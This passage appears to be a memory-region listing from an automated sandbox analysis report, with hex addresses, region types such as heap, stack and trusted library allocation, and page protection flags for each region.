page read and write
|
||
|
13D3000
|
trusted library allocation
|
page read and write
|
||
|
FEF000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
4E0C000
|
stack
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FF1000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
37CF000
|
trusted library allocation
|
page read and write
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
516E000
|
stack
|
page read and write
|
||
|
54DE000
|
trusted library allocation
|
page read and write
|
||
|
89EE000
|
stack
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
37D3000
|
trusted library allocation
|
page read and write
|
||
|
332D000
|
stack
|
page read and write
|
||
|
8AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CAE000
|
stack
|
page read and write
|
||
|
2CAF000
|
stack
|
page read and write
|
||
|
86F000
|
stack
|
page read and write
|
||
|
5580000
|
heap
|
page read and write
|
||
|
6C1E000
|
stack
|
page read and write
|
||
|
7F020000
|
trusted library allocation
|
page execute and read and write
|
||
|
37D0000
|
trusted library allocation
|
page read and write
|
||
|
46B0000
|
heap
|
page read and write
|
||
|
F3D000
|
heap
|
page read and write
|
||
|
3FB9000
|
trusted library allocation
|
page read and write
|
||
|
55A3000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
5EF9000
|
trusted library allocation
|
page read and write
|
||
|
55C0000
|
trusted library allocation
|
page read and write
|
||
|
F9E000
|
heap
|
page read and write
|
||
|
37B4000
|
trusted library allocation
|
page read and write
|
||
|
3819000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
381A000
|
trusted library allocation
|
page read and write
|
||
|
318D000
|
trusted library allocation
|
page execute and read and write
|
||
|
66BF000
|
heap
|
page read and write
|
||
|
37CF000
|
trusted library allocation
|
page read and write
|
||
|
89AE000
|
stack
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FE3000
|
heap
|
page read and write
|
||
|
86A6000
|
heap
|
page read and write
|
||
|
76BE000
|
stack
|
page read and write
|
||
|
3170000
|
trusted library allocation
|
page read and write
|
||
|
37C1000
|
trusted library allocation
|
page read and write
|
||
|
2FAB000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
92D000
|
stack
|
page read and write
|
||
|
FE5000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
8AFD000
|
stack
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
37DF000
|
trusted library allocation
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
37C9000
|
trusted library allocation
|
page read and write
|
||
|
8BFE000
|
stack
|
page read and write
|
||
|
2BCD000
|
heap
|
page read and write
|
||
|
2CB0000
|
trusted library allocation
|
page read and write
|
||
|
3B28000
|
trusted library allocation
|
page read and write
|
||
|
2B4C000
|
stack
|
page read and write
|
||
|
3802000
|
trusted library allocation
|
page read and write
|
||
|
76A5000
|
heap
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
84DF000
|
stack
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
725B000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
740E000
|
stack
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
37D4000
|
trusted library allocation
|
page read and write
|
||
|
8B3B000
|
stack
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
37B6000
|
trusted library allocation
|
page read and write
|
||
|
3828000
|
trusted library allocation
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
2CB7000
|
trusted library allocation
|
page execute and read and write
|
||
|
3057000
|
heap
|
page read and write
|
||
|
66C6000
|
heap
|
page read and write
|
||
|
FEE000
|
heap
|
page read and write
|
||
|
5530000
|
trusted library allocation
|
page read and write
|
||
|
37E5000
|
trusted library allocation
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
FEE000
|
heap
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
3832000
|
trusted library allocation
|
page read and write
|
||
|
7705000
|
heap
|
page read and write
|
||
|
37F9000
|
trusted library allocation
|
page read and write
|
||
|
4D78000
|
trusted library allocation
|
page read and write
|
||
|
D0B000
|
unkown
|
page readonly
|
||
|
85E4000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FEE000
|
heap
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
37C4000
|
trusted library allocation
|
page read and write
|
||
|
FB4000
|
heap
|
page read and write
|
||
|
76FE000
|
heap
|
page read and write
|
||
|
2AFB000
|
heap
|
page read and write
|
||
|
30E000
|
stack
|
page read and write
|
||
|
FBD000
|
heap
|
page read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
13DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FEF000
|
heap
|
page read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
58AA000
|
trusted library allocation
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
3821000
|
trusted library allocation
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
F77000
|
heap
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
FF1000
|
heap
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
9E7000
|
heap
|
page read and write
|
||
|
5540000
|
trusted library allocation
|
page read and write
|
||
|
8410000
|
heap
|
page read and write
|
||
|
753E000
|
stack
|
page read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
D38000
|
unkown
|
page readonly
|
||
|
3843000
|
trusted library allocation
|
page read and write
|
||
|
13FA000
|
trusted library allocation
|
page execute and read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
380F000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
54DB000
|
trusted library allocation
|
page read and write
|
||
|
37D9000
|
trusted library allocation
|
page read and write
|
||
|
1206000
|
heap
|
page read and write
|
||
|
F9C000
|
heap
|
page read and write
|
||
|
37C3000
|
trusted library allocation
|
page read and write
|
||
|
317A000
|
trusted library allocation
|
page read and write
|
||
|
30AD000
|
trusted library allocation
|
page read and write
|
||
|
3AF0000
|
trusted library allocation
|
page read and write
|
||
|
37D8000
|
trusted library allocation
|
page read and write
|
||
|
D1A000
|
unkown
|
page readonly
|
||
|
3160000
|
trusted library section
|
page read and write
|
||
|
8688000
|
heap
|
page read and write
|
||
|
337C000
|
stack
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3807000
|
trusted library allocation
|
page read and write
|
||
|
D1F000
|
unkown
|
page write copy
|
||
|
2F06000
|
heap
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
729D000
|
stack
|
page read and write
|
||
|
8612000
|
heap
|
page read and write
|
||
|
4DCC000
|
stack
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
54EE000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
2FEE000
|
trusted library allocation
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
5888000
|
trusted library allocation
|
page read and write
|
||
|
626E000
|
stack
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page read and write
|
||
|
37E2000
|
trusted library allocation
|
page read and write
|
||
|
8550000
|
trusted library allocation
|
page read and write
|
||
|
3710000
|
trusted library allocation
|
page read and write
|
||
|
3B78000
|
trusted library allocation
|
page read and write
|
||
|
37EB000
|
trusted library allocation
|
page read and write
|
||
|
3717000
|
trusted library allocation
|
page read and write
|
||
|
37C0000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
37B6000
|
trusted library allocation
|
page read and write
|
||
|
381F000
|
trusted library allocation
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
13F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
37C6000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FE9000
|
heap
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
4E20000
|
heap
|
page execute and read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
70DB000
|
stack
|
page read and write
|
||
|
3071000
|
trusted library allocation
|
page read and write
|
||
|
D0B000
|
unkown
|
page readonly
|
||
|
2D7E000
|
stack
|
page read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
3064000
|
trusted library allocation
|
page read and write
|
||
|
75F000
|
stack
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
3F91000
|
trusted library allocation
|
page read and write
|
||
|
FFA000
|
heap
|
page read and write
|
||
|
D1F000
|
unkown
|
page write copy
|
||
|
3183000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
F42000
|
heap
|
page read and write
|
||
|
62AE000
|
stack
|
page read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
37E5000
|
trusted library allocation
|
page read and write
|
||
|
58F7000
|
trusted library allocation
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
1235000
|
heap
|
page read and write
|
||
|
FB9000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3078000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
37C6000
|
trusted library allocation
|
page read and write
|
||
|
69DD000
|
stack
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page readonly
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
37C4000
|
trusted library allocation
|
page read and write
|
||
|
FEB000
|
heap
|
page read and write
|
||
|
5E99000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
55C1000
|
trusted library allocation
|
page read and write
|
||
|
37F1000
|
trusted library allocation
|
page read and write
|
||
|
54C0000
|
trusted library allocation
|
page read and write
|
||
|
773E000
|
heap
|
page read and write
|
||
|
63AE000
|
stack
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
3807000
|
trusted library allocation
|
page read and write
|
||
|
2F8E000
|
stack
|
page read and write
|
||
|
FF4000
|
heap
|
page read and write
|
||
|
37F9000
|
trusted library allocation
|
page read and write
|
||
|
F32000
|
heap
|
page read and write
|
||
|
32FC000
|
stack
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
8BBC000
|
stack
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
37CF000
|
trusted library allocation
|
page read and write
|
||
|
37C0000
|
trusted library allocation
|
page read and write
|
||
|
37CF000
|
trusted library allocation
|
page read and write
|
||
|
44EC000
|
trusted library allocation
|
page read and write
|
||
|
FED000
|
heap
|
page read and write
|
||
|
FE3000
|
heap
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
8C3E000
|
stack
|
page read and write
|
||
|
5823000
|
trusted library allocation
|
page read and write
|
||
|
FCE000
|
heap
|
page read and write
|
||
|
2CE3000
|
heap
|
page read and write
|
||
|
C81000
|
unkown
|
page execute read
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
719D000
|
stack
|
page read and write
|
||
|
667C000
|
heap
|
page read and write
|
||
|
C81000
|
unkown
|
page execute read
|
||
|
689E000
|
stack
|
page read and write
|
||
|
3828000
|
trusted library allocation
|
page read and write
|
||
|
71DA000
|
stack
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
85EC000
|
heap
|
page read and write
|
||
|
2F4D000
|
stack
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
3582000
|
trusted library allocation
|
page readonly
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
3817000
|
trusted library allocation
|
page read and write
|
||
|
35DE000
|
stack
|
page read and write
|
||
|
FC8000
|
heap
|
page read and write
|
||
|
FE3000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
D32000
|
unkown
|
page readonly
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
3790000
|
heap
|
page read and write
|
||
|
37D4000
|
trusted library allocation
|
page read and write
|
||
|
85C000
|
stack
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
37C6000
|
trusted library allocation
|
page read and write
|
||
|
58DC000
|
stack
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
12C0000
|
heap
|
page read and write
|
||
|
1407000
|
heap
|
page read and write
|
||
|
86A9000
|
heap
|
page read and write
|
||
|
37DD000
|
trusted library allocation
|
page read and write
|
||
|
37C2000
|
trusted library allocation
|
page read and write
|
||
|
354E000
|
heap
|
page read and write
|
||
|
4E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
31B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
352D000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
FF8000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
700E000
|
stack
|
page read and write
|
||
|
34FB000
|
heap
|
page read and write
|
||
|
3BA0000
|
trusted library allocation
|
page read and write
|
||
|
FED000
|
heap
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
58F0000
|
heap
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
13CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
506D000
|
stack
|
page read and write
|
||
|
37BB000
|
trusted library allocation
|
page read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
31C8000
|
heap
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
2F91000
|
trusted library allocation
|
page read and write
|
||
|
63FE000
|
stack
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
37BA000
|
trusted library allocation
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
C81000
|
unkown
|
page execute read
|
||
|
D16000
|
unkown
|
page execute and read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
353E000
|
heap
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
383A000
|
trusted library allocation
|
page read and write
|
||
|
37EF000
|
trusted library allocation
|
page read and write
|
||
|
37CC000
|
trusted library allocation
|
page read and write
|
||
|
3BE000
|
stack
|
page read and write
|
||
|
45E000
|
remote allocation
|
page execute and read and write
|
||
|
F65000
|
heap
|
page read and write
|
||
|
37FF000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
83F0000
|
heap
|
page read and write
|
||
|
5EB9000
|
trusted library allocation
|
page read and write
|
||
|
76F7000
|
heap
|
page read and write
|
||
|
F9C000
|
heap
|
page read and write
|
||
|
FE4000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
3184000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3C40000
|
trusted library allocation
|
page read and write
|
||
|
3827000
|
trusted library allocation
|
page read and write
|
||
|
D16000
|
unkown
|
page write copy
|
||
|
6B1D000
|
stack
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
FEF000
|
heap
|
page read and write
|
||
|
F3E000
|
heap
|
page read and write
|
||
|
712C000
|
stack
|
page read and write
|
||
|
FE5000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
3838000
|
trusted library allocation
|
page read and write
|
||
|
37D4000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page execute and read and write
|
||
|
3057000
|
trusted library allocation
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
71E000
|
stack
|
page read and write
|
||
|
6F6D000
|
stack
|
page read and write
|
||
|
54B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
73BE000
|
stack
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
37CA000
|
trusted library allocation
|
page read and write
|
||
|
3803000
|
trusted library allocation
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
709D000
|
stack
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
FF8000
|
heap
|
page read and write
|
||
|
37B6000
|
trusted library allocation
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
FF8000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
7490000
|
heap
|
page read and write
|
||
|
37F3000
|
trusted library allocation
|
page read and write
|
||
|
5780000
|
heap
|
page execute and read and write
|
||
|
6500000
|
heap
|
page read and write
|
||
|
FB9000
|
heap
|
page read and write
|
||
|
5A3F000
|
stack
|
page read and write
|
||
|
D1A000
|
unkown
|
page readonly
|
||
|
F42000
|
heap
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
37ED000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
F65000
|
heap
|
page read and write
|
||
|
37FF000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
4E60000
|
heap
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
357F000
|
heap
|
page read and write
|
||
|
304B000
|
heap
|
page read and write
|
||
|
FBD000
|
heap
|
page read and write
|
||
|
794D000
|
stack
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
4E25000
|
heap
|
page execute and read and write
|
||
|
4EF3000
|
trusted library allocation
|
page read and write
|
||
|
2CD000
|
stack
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
2D2D000
|
stack
|
page read and write
|
||
|
2D1B000
|
heap
|
page read and write
|
||
|
96E000
|
stack
|
page read and write
|
||
|
612E000
|
stack
|
page read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
85B8000
|
heap
|
page read and write
|
||
|
5E91000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
D30000
|
unkown
|
page readonly
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
36DF000
|
stack
|
page read and write
|
||
|
3191000
|
trusted library allocation
|
page read and write
|
||
|
FF0000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
37E2000
|
trusted library allocation
|
page read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
30D9000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
55C5000
|
trusted library allocation
|
page read and write
|
||
|
37CA000
|
trusted library allocation
|
page read and write
|
||
|
6FAF000
|
stack
|
page read and write
|
||
|
3581000
|
trusted library allocation
|
page execute read
|
||
|
32EF000
|
stack
|
page read and write
|
||
|
767D000
|
stack
|
page read and write
|
||
|
D16000
|
unkown
|
page write copy
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3828000
|
trusted library allocation
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
13C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
F9E000
|
heap
|
page read and write
|
||
|
6620000
|
heap
|
page read and write
|
||
|
356E000
|
heap
|
page read and write
|
||
|
FEC000
|
heap
|
page read and write
|
||
|
4E91000
|
trusted library allocation
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
12F0000
|
heap
|
page read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
54E2000
|
trusted library allocation
|
page read and write
|
||
|
37D7000
|
trusted library allocation
|
page read and write
|
||
|
3869000
|
trusted library allocation
|
page read and write
|
||
|
37BB000
|
trusted library allocation
|
page read and write
|
||
|
3AD1000
|
trusted library allocation
|
page read and write
|
||
|
37B4000
|
trusted library allocation
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
383A000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
77EE000
|
stack
|
page read and write
|
||
|
78CF000
|
stack
|
page read and write
|
||
|
55B0000
|
heap
|
page read and write
|
||
|
57DC000
|
stack
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
327C000
|
stack
|
page read and write
|
||
|
37C4000
|
trusted library allocation
|
page read and write
|
||
|
2F5C000
|
stack
|
page read and write
|
||
|
8662000
|
heap
|
page read and write
|
||
|
842B000
|
trusted library allocation
|
page read and write
|
||
|
F42000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
3808000
|
trusted library allocation
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
37C3000
|
trusted library allocation
|
page read and write
|
||
|
774A000
|
heap
|
page read and write
|
||
|
6024000
|
trusted library allocation
|
page read and write
|
||
|
D0B000
|
unkown
|
page readonly
|
||
|
37FB000
|
trusted library allocation
|
page read and write
|
||
|
37C2000
|
trusted library allocation
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
381F000
|
trusted library allocation
|
page read and write
|
||
|
54FD000
|
trusted library allocation
|
page read and write
|
||
|
8430000
|
trusted library allocation
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
85DC000
|
heap
|
page read and write
|
||
|
ECB000
|
stack
|
page read and write
|
||
|
FF0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
37D9000
|
trusted library allocation
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
53FB000
|
trusted library allocation
|
page read and write
|
||
|
1206000
|
heap
|
page read and write
|
||
|
108C000
|
stack
|
page read and write
|
||
|
D1F000
|
unkown
|
page write copy
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
2F1E000
|
stack
|
page read and write
|
||
|
2F2D000
|
stack
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
2D3E000
|
stack
|
page read and write
|
||
|
37BC000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
31AF000
|
stack
|
page read and write
|
||
|
FAE000
|
heap
|
page read and write
|
||
|
F39000
|
heap
|
page read and write
|
||
|
37BE000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
trusted library allocation
|
page read and write
|
||
|
85BE000
|
heap
|
page read and write
|
||
|
F77000
|
heap
|
page read and write
|
||
|
37B0000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
37F8000
|
trusted library allocation
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
FBD000
|
heap
|
page read and write
|
||
|
13E6000
|
heap
|
page read and write
|
||
|
54D4000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
386C000
|
trusted library allocation
|
page read and write
|
||
|
37BB000
|
trusted library allocation
|
page read and write
|
||
|
2C9F000
|
stack
|
page read and write
|
||
|
FE6000
|
heap
|
page read and write
|
||
|
FF8000
|
heap
|
page read and write
|
||
|
770D000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
37BE000
|
trusted library allocation
|
page read and write
|
||
|
3807000
|
trusted library allocation
|
page read and write
|
||
|
774D000
|
heap
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
37B6000
|
trusted library allocation
|
page read and write
|
||
|
37D8000
|
trusted library allocation
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
3825000
|
trusted library allocation
|
page read and write
|
||
|
72DB000
|
stack
|
page read and write
|
||
|
37B1000
|
trusted library allocation
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
85D8000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
D0B000
|
unkown
|
page readonly
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
91B000
|
stack
|
page read and write
|
||
|
D17000
|
unkown
|
page read and write
|
||
|
4D60000
|
heap
|
page readonly
|
||
|
311E000
|
stack
|
page read and write
|
||
|
37D9000
|
trusted library allocation
|
page read and write
|
||
|
F0A000
|
heap
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
849D000
|
stack
|
page read and write
|
||
|
381D000
|
trusted library allocation
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
85D4000
|
heap
|
page read and write
|
||
|
FB9000
|
heap
|
page read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
37DD000
|
trusted library allocation
|
page read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
37C9000
|
trusted library allocation
|
page read and write
|
||
|
3137000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
31B2000
|
trusted library allocation
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
37C7000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
5502000
|
trusted library allocation
|
page read and write
|
||
|
306D000
|
stack
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
F9C000
|
heap
|
page read and write
|
||
|
7715000
|
heap
|
page read and write
|
||
|
2BBA000
|
heap
|
page read and write
|
||
|
29B8000
|
trusted library allocation
|
page read and write
|
||
|
87B2000
|
trusted library allocation
|
page read and write
|
||
|
2CB2000
|
trusted library allocation
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
12B3000
|
heap
|
page read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
3850000
|
trusted library allocation
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
8963000
|
trusted library allocation
|
page read and write
|
||
|
3FDD000
|
trusted library allocation
|
page read and write
|
||
|
3827000
|
trusted library allocation
|
page read and write
|
||
|
6F0F000
|
stack
|
page read and write
|
||
|
383A000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
FAF000
|
heap
|
page read and write
|
||
|
FAF000
|
heap
|
page read and write
|
||
|
1210000
|
heap
|
page read and write
|
||
|
FB8000
|
heap
|
page read and write
|
||
|
592A000
|
trusted library allocation
